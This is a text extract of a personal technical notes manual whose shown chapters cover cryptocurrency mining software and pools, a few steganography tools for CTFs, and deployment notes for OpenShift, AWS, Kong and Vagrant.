12.1. Tips 49 Omid Raha MyStack Documentation, Release 0.1

Blockchain explorer https://dogechain.info/

Get Free Dogecoins http://indogewetrust.com/ http://www.dogefaucet.com/

12.1.12 Ripple XRP https://ripple.com/

Install https://rippex.net/carteira-ripple.php#/ https://buyingripple.com/#walletsetup

Blockchain explorer https://xrpcharts.ripple.com/#/graph https://ripple.com/build/ripple-info-tool/ https://bithomp.com/explorer/

12.1.13 Cloud Mining https://hashflare.io/#plans https://www.genesis-mining.com/pricing https://www.ccgmining.com/pricing-hash-rate-bch.php https://bitmann.org/hashflare-vs-genesis-mining/

12.2 Mining

12.2.1 Mining software https://en.bitcoin.it/wiki/Mining_software cgminer https://github.com/ckolivas/cgminer

$ sudo apt-get install cgminer $ cgminer --userpass omidraha.worker1:anything --url stratum+tcp://jp.stratum.

˓→slushpool.com:3333

50 Chapter 12. Crypto currency Omid Raha MyStack Documentation, Release 0.1 bfgminer http://bfgminer.org/ https://linuxhint.com/bfgminer-ubuntu/ https://bitcointalk.org/?topic=877081

$ sudo apt-get install bfgminer $ bfgminer -o stratum+tcp://jp.stratum.slushpool.com:3333 -u omidraha.worker1 -p

˓→anything poclbm https://github.com/m0mchil/poclbm

$ git clone https://github.com/m0mchil/poclbm $ cd poclbm $ poclbm.py omidraha.worker1:[email protected]:3333

MultiMiner https://github.com/nwoolls/MultiMiner https://github.com/nwoolls/MultiMiner/wiki/Installation

12.2.2 Pool https://en.bitcoin.it/wiki/Comparison_of_mining_pools slushpool https://slushpool.com/help/get-started/getting_started https://slushpool.com/help/get-started/advanced_mining https://slushpool.com/help/get-started/mining_beginners zcache https://slushpool.com/help/get-started/getting_started_zcash https://support.slushpool.com/section/29-zcash-mining-setup

flypool https://flypool.org/ minergate https://www.minergate.com/pool-stats/eth

12.2. Mining 51 Omid Raha MyStack Documentation, Release 0.1 antpool https://www.antpool.com/

12.2.3 Hash Rate

Hash Rate Measured & its Unit

Hash rate denominations 1 kH/s is 1,000 (one thousand) hashes per second 1 MH/s is 1,000,000 (one million) hashes per second. 1 GH/s is 1,000,000,000 (one billion) hashes per second. 1 TH/s is 1,000,000,000,000 (one trillion) hashes per second. 1 PH/s is 1,000,000,000,000,000 (one quadrillion) hashes per second. 1 EH/s is 1,000,000,000,000,000,000 (one quintillion) hashes per second. Common Hash rate Conversions 1 MH/s = 1,000 kH/s 1 GH/s = 1,000 MH/s = 1,000,000 kH/s 1 TH/s = 1,000 GH/s = 1,000,000 MH/s = 1,000,000,000 kH/s 1 PH/s = 1,000 TH/s = 1,000,000 GH/s = 1,000,000,000 MH/s 1 EH/s = 1,000 PH/s = 1,000,000 TH/s = 1,000,000,000 GH/s https://coinsutra.com/hash-rate-or-hash-power/

12.2.4 Best coin to mine https://whattomine.com/calculators https://www.bitdegree.org/tutorials/best-coin-to-mine/#Best_Coin_to_Mine_Some_Examples https://www.cointelligence.com/content/cryptocurrencies-can-still-mine-cpu-gpu-2018/ https://www.nicehash.com/

52 Chapter 12. Crypto currency CHAPTER 13

CTF

Contents:

13.1 Tips

13.1.1 Tools

Steganography audacity # fast, cross-platform audio editor outguess # Universal Steganographic tool steghide # A steganography hiding tool

53 Omid Raha MyStack Documentation, Release 0.1

54 Chapter 13. CTF CHAPTER 14

Deploy

Contents:

14.1 Open shift

14.1.1 Installing the OpenShift Client Tools https://developers.openshift.com/en/getting-started-client-tools.html http://appsembler.com/blog/django-deployment-using-openshift/

$ sudo apt-get install ruby-full rubygems git-core

$ sudo gem install rhc

$ sudo rhc setup

OpenShift Client Tools(RHC) Setup Wizard

This wizard will help you upload your SSH keys, set your application namespace, and

˓→check that other programs like Git are properly installed.

If you have your own OpenShift server, you can specify it now. Just hit enter to use

˓→the server for OpenShift Online: openshift.redhat.com. Enter the server hostname: |openshift.redhat.com|

You can add more servers later using 'rhc server'.

Login to openshift.redhat.com: or@*****.com Password: *********************

OpenShift can create and store a token on disk which allows to you to access the

˓→server without using your password. The key is stored in your home directory and (continues on next page) ˓→should be kept secret. You can

55 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) delete the key at any time by running 'rhc logout'. Generate a token now?(yes|no) yes Generating an authorization token for this client ... lasts 30 days

Saving configuration to /home/or/.openshift/express.conf ... done

Checking for git ... found git version2.1.1

Checking common problems .

An SSH connection could not be established to django-*****.rhcloud.com. Your SSH ˓→configuration may not be correct, or the application may not be responding.

˓→Authentication failed for user *****@django-*****.rhcloud.com(Net::SSH::AuthenticationFailed)

Checking for a domain ... or

Checking for applications ... found1

django http://django-*****.rhcloud.com/

You are using2 of3 total The following gear sizes are available to you: small

Your client tools are now configured. or@debian:~$ ssh-add ~/.ssh/id_rsa

Identity added: /home/or/.ssh/id_rsa(/home/or/.ssh/id_rsa) or@debian:~$ ssh *****@django-*****.rhcloud.com

*********************************************************************

You are accessing a service that is for use only by authorized users. If you do not have authorization, discontinue use at once. Any use of the services is subject to the applicable terms of the agreement which can be found at: https://www.openshift.com/legal

*********************************************************************

Welcome to OpenShift shell

This shell will assist you in managing OpenShift applications.

!!! IMPORTANT !!! IMPORTANT !!! IMPORTANT !!! Shell access is quite powerful and it is possible for you to accidentally damage your application. Proceed with care! If worse comes to worst, destroy your application with "rhc app delete" and recreate it !!! IMPORTANT !!! IMPORTANT !!! IMPORTANT !!!

Type "help" for more info.

(continues on next page)

56 Chapter 14. Deploy Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) [django-****.rhcloud.com ****]\> ls app-deployments app-root gear-registry git haproxy python [django-****.rhcloud.com ****]\> exit exit Connection to django-****.rhcloud.com closed. or@debian:~$

$ rhc deployment-list django

# Tail the logs of an application $ rhc tail django

[openshift-server]\>ls -la app-root/data

[openshift-server]\>gear deploy

14.1.2 Django admin pass

[openshift-server]\> python app-root/repo/wsgi/my_prj/manage.py syncdb

[openshift-server]\> cp app-root/repo/wsgi/my_prj/sqlite3.db app-root/data

14.1.3 Openshift Environment Variables List https://developers.openshift.com/en/managing-environment-variables.html

14.1.4 Update rhc

$ gem update rhc httpclient

14.1.5 How to create and unset environment variables on the server ? https://help.openshift.com/hc/en-us/articles/202399310-How-to-create-and-use-environment-variables-on-the-server- https://blog.openshift.com/taking-advantage-of-environment-variables-in-openshift-php-apps/

$ rhc set-env My_VAR_1=my_val_1 My_VAR_2=my_val_2 -a app_name

$ rhc env set My_VAR_1=my_val_1 -a app_name

$ rhc env unset My_VAR_1 -a app_name

14.1.6 Restart the application

14.1. Open shift 57 Omid Raha MyStack Documentation, Release 0.1

$ rhc app restart -a app_name

$ rhc app stop -a app_name $ rhc app start -a app_name

14.1.7 Using redmine on openshift https://www.openshift.com/quickstarts/redmine-24 https://github.com/openshift/openshift-redmine-quickstart https://forums.openshift.com/how-to-install-redmine-plugins-on-openshift

14.1.8 Payment https://help.openshift.com/hc/en-us/articles/202525320-What-are-the-payment-methods-for-OpenShift-Online- https://www.openshift.com/products/pricing http://www.tehranpayment.com/%d8%aa%d9%85%d8%a7%d8%b3-%d8%a8%d8%a7-%d9%85%d8%a7

14.1.9 To see where an existing application is being hosting https://developers.openshift.com/en/overview-platform-features.html#scaling

$ rhc app show --gears -a django

ID State Cartridges Size Region Zone SSH URL — ——- ———————- —– ————- ————– ——- * started python-2.7 haproxy-1.4 small aws-us-east-1 aws-us-east-1e *.rhcloud.com * started postgresql-9.2 small aws-us-east-1 aws-us-east-1e *.rhcloud.com

14.2 Amazon https://github.com/boto/boto https://github.com/bitly/asyncdynamo https://pypi.python.org/pypi/dynamodb-mapper/1.1.0 https://pypi.python.org/pypi/ddbmock http://boto.readthedocs.org/en/latest/dynamodb2_tut.html Amazon upload http://stackoverflow.com/questions/670442/asynchronous-file-upload-to-amazon-s3-with-django https://github.com/jezdez/django-queued-storage https://github.com/sbc/django-uploadify-s3 https://github.com/burgalon/plupload-s3mixin http://docs.aws.amazon.com/AmazonS3/latest/dev/UsingHTTPPOST.html https://aws.amazon.com/items/1434?externalID=1434

58 Chapter 14. Deploy Omid Raha MyStack Documentation, Release 0.1 https://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html Django S3 https://github.com/etianen/django-s3-storage https://django-storages.readthedocs.org/en/latest/index.html Time Limited Signed UR http://www.bucketexplorer.com/documentation/amazon-s3–how-to-generate-url-for-amazon-s3-files.html http://stackoverflow.com/questions/17831535/how-to-generate-file-link-without-expiry AWS SDK for Python (Boto) http://aws.amazon.com/sdk-for-python/ http://boto.readthedocs.org/en/latest/index.html http://aws.amazon.com/python/ http://stackoverflow.com/questions/4993439/how-can-i-access-s3-files-in-python-using-urls http://sendapatch.se/projects/simples3/ http://stackoverflow.com/questions/11026719/is-there-a-way-to-serve-s3-files-directly-to-the-user-with-a-url-that-cant-be-s sign URLs with an IP CloudFront http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/GettingStarted.html http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/PrivateContent.html http://improve.dk/how-to-set-up-and-serve-private-content-using-s3/ session based authorization http://stackoverflow.com/questions/12279056/rails-allow-download-of-files-stored-on-s3-without-showing-the-actual-s3-url-to download private file https://medium.com/@hiromitz/generate-expiring-amazon-s3-link-with-custom-file-name-c277975c3b8d https://gist.github.com/hiromitz/9321852 https://pypi.python.org/pypi/Ax_Handoff/1.1.3 https://pypi.python.org/pypi/s3url/0.1.6 Boto http://boto.readthedocs.org/en/latest/index.html http://aws.amazon.com/developers/getting-started/python/ http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/private-content-signed-urls-overview.html http://www.networkautomation.com/automate/urc/resources/livedocs/am/10/Technical_Reference/Actions___Activities/Amazon_S3/S3_- _Get_Predesigned_URL.htm Amazon EC2 Amazon Elastic Compute Cloud (Amazon EC2) is a web service that provides resizable compute capacity in the cloud. It is designed to make web-scale cloud computing easier for developers. Amazon EBS

14.2. Amazon 59 Omid Raha MyStack Documentation, Release 0.1

Amazon Elastic Block Store (Amazon EBS) provides persistent block level storage volumes for use with Amazon EC2 instances in the AWS Cloud. Each Amazon EBS is automatically replicated within its Availability Zone to protect you from component failure, offering high availability and durability. Amazon EBS volumes offer the consistent and low-latency performance needed to run your workloads. With Amazon EBS, you can scale your usage up or down within minutes – all while paying a low price for only what you provision. ### http://alestic.com/2012/01/ec2-ebs-boot-recommended http://tiger-fish.com/blog/how-boot-amazon-ec2-instance-ebs-volume http://thomas.broxrost.com/2008/08/21/persistent-django-on-amazon-ec2-and-ebs-the-easy-way/ ### http://stackoverflow.com/questions/10390244/how-to-set-up-a-django-project-with-django-storages-and-amazon-s3-but-with-diff https://github.com/mstarinteractive/django-s3storage https://github.com/mstarinteractive/django-s3storage/blob/master/example_settings.py http://tartarus.org/james/diary/2013/07/18/fun-with-django-storage-backends http://djangotricks.blogspot.de/2013/12/how-to-store-your-media-files-in-amazon.html https://github.com/pcraciunoiu/django-s3sync How to serve your media files via Amazon’s Simple Storage Service http://stackoverflow.com/questions/11403063/setting-media-url-for-django-heroku-app-amazon-s3 https://github.com/django-compressor/django-compressor http://stackoverflow.com/questions/11403063/setting-media-url-for-django-heroku-app-amazon-s3 http://stackoverflow.com/questions/10390244/how-to-set-up-a-django-project-with-django-storages-and-amazon-s3-but-with-diff http://www.caktusgroup.com/blog/2014/11/10/Using-Amazon-S3-to-store-your-Django-sites-static-and-media-files/ http://martinbrochhaus.com/s3.html http://stackoverflow.com/questions/9464038/redis-celery-configuration-over-amazon-ec2 http://stackoverflow.com/questions/14283021/how-to-use-django-celery-rq-worker-to-execute-a-video-filetype-conversion-ffm http://django-storages.readthedocs.org/en/latest/ https://docs.djangoproject.com/en/1.7/howto/static-files/deployment/#staticfiles-from-cdn ### http://www.caktusgroup.com/blog/2014/11/10/Using-Amazon-S3-to-store-your-Django-sites-static-and-media-files/ ### ### http://docs.aws.amazon.com/general/latest/gr/signing_aws_api_requests.html http://docs.aws.amazon.com/AmazonS3/latest/dev/RESTAuthentication.html http://docs.aws.amazon.com/STS/latest/APIReference/Welcome.html ### ### http://docs.aws.amazon.com/AmazonS3/latest/dev/UsingHTTPPOST.html

60 Chapter 14. Deploy Omid Raha MyStack Documentation, Release 0.1 https://aws.amazon.com/items/1434?externalID=1434 ### ### AWS RDS Postgres DB instance http://aws.amazon.com/rds/postgresql/ http://aws.amazon.com/about-aws/whats-new/2013/12/11/aws-elastic-beanstalk-adds-background-task-handling-and-rds-postgresql-support/ http://stackoverflow.com/questions/26043706/how-to-use-boto-to-launch-an-elastic-beanstalk-with-an-rds-resource http://stackoverflow.com/questions/25946723/aws-cli-create-rds-with-elasticbeanstalk-create-environment/ 25963800#25963800 http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/create_deploy_Python_flask.html http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/create_deploy_Python.rds.html http://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/CHAP_PostgreSQL.html http://stackoverflow.com/questions/13424267/setting-up-django-and-postgresql-on-two-different-ec2-instances http://stackoverflow.com/questions/12850550/postgresql-for-django-on-elastic-beanstalk http://instagram-engineering.tumblr.com/post/13649370142/what-powers-instagram-hundreds-of-instances http://www.holovaty.com/writing/aws-notes/ http://stackoverflow.com/questions/22599367/deploy-django-using--to-aws-ec2-and-rds http://stackoverflow.com/questions/20914706/aws-elastic-beanstalk-hosting-postresql-on-deployed-ec2-server-with-django http://www.quora.com/If-I-have-an-AWS-RDS-Postgres-DB-instance-do-I-also-need-to-install-Postgres-in-the-EC2-instance-that-has-my-Django-application-in-it http://stackoverflow.com/questions/25740502/aws-can-a-beanstalk-instance-be-deployed-with-a-postgres-rds http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/AWSHowTo.RDS.html ### https://github.com/tornadoweb/tornado/wiki/Links http://stackoverflow.com/questions/11638135/amazon-aws-python-webframework-dynamodb ### http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/using-features.loggingS3.title.html ### http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/command-options.html#command-options-python http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/create_deploy_Python_custom_container.html ### http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/concepts.platforms.html http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/concepts.concepts.architecture.html ### http://docs.aws.amazon.com/general/latest/gr/rande.html?r=1166 ### http://docs.aws.amazon.com/IAM/latest/ UserGuide/Using_SettingUpUser.html http://docs.aws.amazon.com/general/latest/gr/getting-aws-sec-creds.html http://docs.aws.amazon.com/IAM/latest/UserGuide/IAMBestPractices.html ### http://aws.amazon.com/code/6752709412171743 ### Deploying a Django app on Amazon EC2 instance http://agiliq.com/blog/2014/08/deploying-a-django-app-on-amazon-ec2-instance/

14.2. Amazon 61 Omid Raha MyStack Documentation, Release 0.1 http://thomas.broxrost.com/2008/08/21/persistent-django-on-amazon-ec2-and-ebs-the-easy-way/ http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/create_deploy_Python_django.html https://ashokfernandez.wordpress.com/2014/03/11/deploying-a-django-app-to-amazon-aws-with-nginx-gunicorn-git/ https://github.com/ashokfernandez/Django-Fabric-AWS—amazon_app http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/create_deploy_Python_flask.html ### Amazon ECS http://docs.aws.amazon.com/AmazonECS/latest/developerguide/get-set-up-for-amazon-ecs.html Identity and Access Management https://console.aws.amazon.com/iam/home#home Before the Amazon ECS agent can register container instance into a cluster, the agent must know which account credentials to use. You can create an IAM role that allows the agent to know which account it should register the container instance with. When you launch an instance with the Amazon ECS-optimized AMI provided by Amazon using this role, the agent automatically registers the container instance into your default cluster. The Amazon ECS container agent also makes calls to the Amazon EC2 and Elastic Load Balancing on your behalf, so container instances can be registered and deregistered with load balancers. Before you can attach a load balancer to an Amazon ECS service, you must create an IAM role for your services to use before you start them. This requirement applies to any Amazon ECS service that you plan to use with a load balancer. http://docs.aws.amazon.com/AmazonECS/latest/developerguide/instance_IAM_role.html https://console.aws.amazon.com/iam/home#roles Amazon EC2 Role for EC2 Container Service Role to allow EC2 instances in an Amazon ECS cluster to access Amazon ECS. https://console.aws.amazon.com/ec2/ http://www.prokerala.com/travel/distance/from-california/to-vancouver-usa/ Distance To Vancouver From Oregon is: 1692 miles / 2723.01 km / 1470.31 nautical miles Distance To Virginia From Vancouver is: 1725 miles / 2776.12 km / 1498.98 nautical miles Distance To Vancouver From California is: 2403 miles / 3867.25 km / 2088.15 nautical miles http://docs.aws.amazon.com/AmazonECS/latest/developerguide/get-set-up-for-amazon-ecs.html#create-an-iam-user http://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html http://docs.aws.amazon.com/AmazonECR/latest/userguide/ECR_GetStarted.html http://docs.aws.amazon.com/AmazonECS/latest/developerguide/get-set-up-for-amazon-ecs.html http://docs.aws.amazon.com/AmazonECS/latest/developerguide/ECS_GetStarted.html https://us-west-2.console.aws.amazon.com/ecs/home?region=us-west-2#/firstRun # Virginia https://console.aws.amazon.com/ecs/home?region=us-east-1#/firstRun https://aws.amazon.com/ecr/getting-started/ ECR http://docs.aws.amazon.com/AmazonECR/latest/userguide/ECR_GetStarted.html https://console.aws.amazon.com/ecs/home?region=us-east-1#/repositories http://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-set-up.html#cli-signup

62 Chapter 14. Deploy Omid Raha MyStack Documentation, Release 0.1 https://console.aws.amazon.com/ecs/home?region=us-east-1#/repositories/create aws configure aws ecr get-login –region us-east-1 http://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html http://docs.aws.amazon.com/AmazonECR/latest/userguide/docker-pull-ecr-image.html https://docs.docker.com/mac/ step_six/ https://docs.docker.com/engine/reference/commandline/tag/ http://docs.aws.amazon.com/AmazonECR/latest/userguide/ECR_AWSCLI.html http://docs.aws.amazon.com/AmazonECR/latest/userguide/docker-push-ecr-image.html https://aws.amazon.com/blogs/aws/ec2-container-registry-now-generally-available/ Effective today, Amazon ECR is available in US East (Northern Virginia) with more regions on the way soon! Your Amazon ECS tasks run on container instances (Amazon EC2 instances that are running the ECS container agent). http://docs.aws.amazon.com/AmazonECS/latest/developerguide/task_defintions.html http://docs.aws.amazon.com/AmazonECS/latest/developerguide/service-load-balancing.html A service lets you specify how many copies of your task definition to run. You could also use Elastic Load Balancing to distribute incoming traffic to your tasks. Amazon ECS keeps that number of tasks running and coordinates task with the load balancer. http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/create_deploy_docker_ecstutorial.html http://docs. aws.amazon.com/elasticbeanstalk/latest/dg/create_deploy_docker_ecs.html http://docs.aws.amazon.com/ elasticbeanstalk/latest/dg/create_deploy_docker.html https://aws.amazon.com/about-aws/whats-new/2015/03/ aws-elastic-beanstalk-supports-multi-container-docker-environments/ http://cloudacademy.com/blog/amazon-ec2-container-service-docker-aws/ Task definitions specify the container information for your application, such as how many containers are part of your task, what resources they will use, how they are linked together, and which host ports they will use http://docs.aws.amazon.com/AmazonECS/latest/developerguide/cmd-ecs-cli-compose.html https://aws.amazon.com/about-aws/whats-new/2015/10/introducing-the-amazon-ec2-container-service-cli-with-support-for-docker-compose/ http://docs.aws.amazon.com/AmazonECS/latest/developerguide/cmd-ecs-cli-compose-service.html After you create a cluster, you can launch container instances, and then run tasks http://docs.aws.amazon.com/AmazonECS/latest/developerguide/ECS_CLI.html http://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html#cli-quick-configuration http://docs.aws.amazon.com/AmazonECS/latest/developerguide/ECS_CLI_tutorial.html http://docs.aws.amazon.com/AmazonECS/latest/developerguide/task_definition_parameters.html https://aws.amazon.com/blogs/aws/ec2-container-service-ecs-update-access-private-docker-repos-mount-volumes-in-containers/ http://docs.aws.amazon.com/AmazonECS/latest/developerguide/using_data_volumes.html http://docs.aws.amazon.com/AWSSimpleQueueService/latest/SQSGettingStartedGuide/AWSCredentials.html

14.2.1 RDS http://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.MultiAZ.html http://aws.amazon.com/rds/details/multi-az/

14.2. Amazon 63 Omid Raha MyStack Documentation, Release 0.1

If a storage volume on your primary fails in a Multi-AZ deployment, Amazon RDS automatically initiates a failover to the up-to-date standby. Compare this to a Single-AZ deployment: in case of a Single-AZ database failure, a user- initiated point-in-time-restore operation will be required. This operation can take several hours to complete, and any data updates that occurred after the latest restorable time (typically within the last five minutes) will not be available.

14.2.2 EC2 Container Service

$ sudo apt-cache search awscli awscli - Universal Command Line Environment for AWS

$ sudo apt-get install awscli

$ aws --version aws-cli/1.10.1 Python/3.5.1+ Linux/4.4.0-1-amd64 botocore/1.3.23

$ aws configure AWS Access Key ID[]: **************** AWS Secret Access Key[]: **************** Default region name[oregon]: us-west-2 Default output format[json]:

$ aws iam list-users

$ aws ecs create-cluster help $ aws ecs list-container-instances help

$ aws ecs create-cluster --cluster-name demo-01 { "cluster":{ "pendingTasksCount":0, "runningTasksCount":0, "clusterName": "demo-01", "status": "ACTIVE", "clusterArn": "arn:aws:ecs:us-west-2:642913345125:cluster/demo-01", "activeServicesCount":0, "registeredContainerInstancesCount":0 } }

$ aws ecs list-container-instances --cluster demo-01

Within ECS, you create task definitions, which are very similar to a docker-compose.yml file. A task definition is a collection of container definitions, each of which has a name, the Docker image to run, and options to override the image’s entrypoint and command. The container definition is also where you define environment variables, port map- pings, volumes to mount, memory and CPU allocation, and whether or not the specific container should be considered essential, which is how ECS knows whether the task is healthy or needs to be restarted. You can set up multiple container definitions within the task definition for multi-container applications. ECS knows how to pull from the Official Docker Hub by default and can be configured to pull from private registries as well. Private registries, however, require additional configuration for the Docker client installed on the EC2 host instances. Once you have a task definition, you can create a service from it. A service allows you to define the number of tasks you want running and associate with an Elastic Load Balancer (ELB). When a task maps to particular ports, like 443, only one task instance can be running per EC2 instance in in the ECS cluster. Therefore, you cannot run more tasks than you have EC2 instances. In fact, you’ll want to make sure you run at least one less task than the number of EC2 instances in order to take advantage of blue-green deployments. Task definitions are versioned, and Services are configured to use a specific version of a task definition.

64 Chapter 14. Deploy Omid Raha MyStack Documentation, Release 0.1

https://blog.codeship.com/easy-blue-green-deployments-on-amazon-ec2-container-service/#comments

14.3 Configuration management

Configuration management (CM) is a systems engineering process for establishing and maintaining consistency of a product’s performance, functional and physical attributes with its requirements, design and operational information throughout its life.

14.3.1 Operating System configuration management

Configuration management can be used to maintain OS configuration files. Example systems include Quattor, CFEngine, Bcfg2, Puppet, Ansible, Vagrant and Chef. https://en.wikipedia.org/wiki/Configuration_management https://blog.serverdensity.com/what-ive-learnt-from-using-ansible-exclusively-for-2-years/ http://thenewstack.io/are-docker-users-migrating-to-ansible-and-away-from-puppet-and-chef/ http://chadfowler.com/blog/2013/06/23/immutable-deployments/ http://theagileadmin.com/what-is-devops/

14.4 Tips

14.4.1 PaaS (platform as a service) https://openshift.redhat.com/ https://www.dotcloud.com/pricing.html https://www.heroku.com/ http://www.paasify.it/compare/heroku-vs-openshift%20online http://www.slideshare.net/Pivotal/paa-s-comparison2014v08

14.4.2 VPS Provider https://www.digitalocean.com/pricing/ https://www.vultr.com/pricing/ https://www.dreamhost.com/cloud/storage/ http://www.rackspace.com/cloud/servers http://www.cloudvps.com/virtual-private-server/prices https://www.transip.eu/vps/ https://www.transip.eu/demo-account/?landing=/cp/vps/ https://www.transip.eu/cp/vps/ #vps-informatie https://www.transip.eu/question/350-utilize-disk-space-for-bladevps/

14.3. Configuration management 65 Omid Raha MyStack Documentation, Release 0.1

14.4.3 Digital Ocean http://www.scriptrock.com/articles/digitalocean-vs-aws

More storage option? https://www.digitalocean.com/community/questions/can-i-increase-storage https://www.digitalocean.com/community/questions/more-storage-option http://digitalocean.uservoice.com/forums/136585-digital-ocean/suggestions/3127077-extra-diskspace- http://digitalocean.uservoice.com/forums/136585-digitalocean/suggestions/6662293-s3-object-storage-alternative https://www.digitalocean.com/community/questions/getting-more-space-on-droplet https://raymii.org/s/articles/Digital_Ocean_Sucks._Use_Digital_Ocean.html http://venturebeat.com/2013/12/30/iaas-provider-digitalocean-finds-itself-back-in-security-trouble/ https://news.ycombinator.com/item?id=6764102 mysqldump –skip-extended-insert –all-databases –single-transaction –master-data=2 –flush-logs | gzip -9 –rsyncable > backup.sql.gz sudo -u postgres pg_dumpall | gzip -9 –rsyncable > backup.sql.gz

Using https://firefli.de/tutorials/s3fs-and-dreamobjects.html http://www.maketecheasier.com/mount-amazon-s3-in-ubuntu/

Security issues https://github.com/fog/fog/issues/2525 http://seclists.org/fulldisclosure/2013/Aug/53

Others http://rdiff-backup.nongnu.org/ http://www.rsync.net/products/pricing.html https://github.com/vgough/encfs https://github.com/s3fs-fuse/s3fs-fuse

14.4.4 Amazon http://aws.amazon.com http://aws.amazon.com/iam/ http://aws.amazon.com/s3/ http://aws.amazon.com/ec2/

66 Chapter 14. Deploy Omid Raha MyStack Documentation, Release 0.1 http://aws.amazon.com/ec2/pricing/ http://aws.amazon.com/free/ http://aws.amazon.com/ec2/instance-types/ http://aws.amazon.com/elasticbeanstalk/ http://aws.amazon.com/elasticbeanstalk/pricing/ EC2 IaaS

Deploy django on amazon http://www.nickpolet.com/blog/deploying-django-on-aws/1/ http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/create_deploy_Python_django.html http://agiliq.com/blog/2014/08/deploying-a-django-app-on-amazon-ec2-instance/ http://agiliq.com/blog/2009/03/django-with-mysql-and-apache-on-ec2/ http://thomas.broxrost.com/2008/08/21/persistent-django-on-amazon-ec2-and-ebs-the-easy-way/ http://pragmaticstartup.wordpress.com/2011/04/02/non-techie-guide-to-setting-up-django-apache-mysql-on-amazon-ec2/ http://www.philroche.net/archives/simple-django-install-on-amazon-ec2/ http://www.mlsite.net/blog/?p=43 http://michal.karzynski.pl/blog/2013/06/09/django-nginx-gunicorn-virtualenv-supervisor/

14.4.5 Blue Green Deployment http://martinfowler.com/bliki/BlueGreenDeployment.html

14.4.6 Continuous Delivery http://martinfowler.com/books/continuousDelivery.html

14.4.7 Continuous Integration http://martinfowler.com/articles/continuousIntegration.html

14.4.8 Feature toggle http://code.flickr.net/2009/12/02/flipping-out/ https://en.wikipedia.org/wiki/Feature_toggle

14.4.9 Log collection service http://logstash.net/ https://papertrailapp.com/

14.4. Tips 67 Omid Raha MyStack Documentation, Release 0.1

14.4.10 How to configure Google Client Id and Google Client Secret? https://console.developers.google.com/project http://storeprestamodules.com/blog/how-to-configure-google-client-id-and-google-client-secret/

14.4.11 Kong with docker docker run --rm --name kong-database \ -p 5432:5432 \ -e "POSTGRES_USER=kong" \ -e "POSTGRES_DB=kong" \ postgres:9.4 docker run --rm --name kong \ --link kong-database:kong-database \ -e "DATABASE=postgres" \ -p 8000:8000 \ -p 8443:8443 \ -p 8001:8001 \ -p 7946:7946 \ -p 7946:7946/udp \ --security-opt :unconfined \ mashape/kong curl -i -X GET \ --url http://localhost:8000/ \ --header 'Host: mockbin.com' curl -i -X POST \ --url http://localhost:8001/apis/ \ --data 'name=mockbin' \ --data 'upstream_url=http://mockbin.com/' \ --data 'request_host=mockbin.com' curl -i -X POST \ --url http://localhost:8001/apis/mockbin/plugins/ \ --data 'name=key-auth' curl -i -X POST \ --url http://localhost:8001/consumers/ \ --data "username=Jason" curl -i -X POST \ --url http://localhost:8001/consumers/Jason/key-auth/ \ --data 'key=ENTER_KEY_HERE' curl -i -X GET \ --url http://localhost:8000 \ --header "Host: mockbin.com" \ --header "apikey: ENTER_KEY_HERE" https://github.com/Mashape/kong/

68 Chapter 14. Deploy Omid Raha MyStack Documentation, Release 0.1

14.4.12 Combine and minimize JavaScript, CSS and Images files https://github.com/mrclay/minify https://github.com/yui/yuicompressor https://github.com/django-compressor/django-compressor https://github.com/jazzband/django-pipeline https://samaxes.com/2009/05/combine-and-minimize-javascript-and--files-for-faster-loading/ https://robertnyman.com/2010/01/19/tools-for-concatenating-and-minifying-css-and--files-in-different-development-environments/ https://robertnyman.com/2010/01/15/how-to-reduce-the-number-of-http-requests/ http://www.revsys.com/12days/front-end-performance/ https://developers.google.com/speed/pagespeed/insights/?url=google.com https://developers.google.com/speed/docs/insights/rules#speed-rules

14.5 Vagrant

14.5.1 Quick Guide to Vagrant on Amazon EC2 https://github.com/mitchellh/vagrant-aws http://www.cantoni.org/2014/09/22/quick-guide-vagrant-amazon-ec2 http://www.devopsdiary.com/blog/2013/05/07/automated-deployment-of-aws-ec2-instances-with-vagrant-and-puppet/

14.5.2 How to use vagrant in a proxy enviroment?

$ vagrant plugin install vagrant-proxyconf $ vim ~/.vagrant.d/Vagrantfile Vagrant.configure("2") do |config| if Vagrant.has_plugin?("vagrant-proxyconf") config.proxy.http= "http:///192.168.1.234:8080/" config.proxy.https= "http://192.168.1.234:8080/" config.proxy.no_proxy= "localhost,127.0.0.1,.example.com" end # ... other stuff end https://github.com/tmatilai/vagrant-proxyconf http://stackoverflow.com/questions/19872591/how-to-use-vagrant-in-a-proxy-enviroment

14.5.3 Disable or remove the proxy

$ VAGRANT_HTTP_PROXY="" VAGRANT_HTTPS_PROXY="" vagrant up --no-provision $ vagrant ssh $ curl 'https://api.ipify.org?format=json'

14.5. Vagrant 69 Omid Raha MyStack Documentation, Release 0.1

14.5.4 Install ubuntu

$ vagrant init ubuntu/trusty64 $ vagrant init ubuntu/xenial64 $ vagrant up --provider virtualbox $ vagrant ssh

14.5.5 Multi-Machine https://atlas.hashicorp.com/ubuntu https://www.vagrantup.com/docs/multi-machine/

14.5.6 CPU and Memory https://www.vagrantup.com/docs/virtualbox/configuration.html config.vm.provider "virtualbox" do |v| v.memory= 1024 v.cpus=2 end

14.5.7 Update plugin

Plugin Update vagrant plugin update[]

14.6 Monitoring Tools

14.6.1 New Relic

Configure newrelic with Gunicorn:

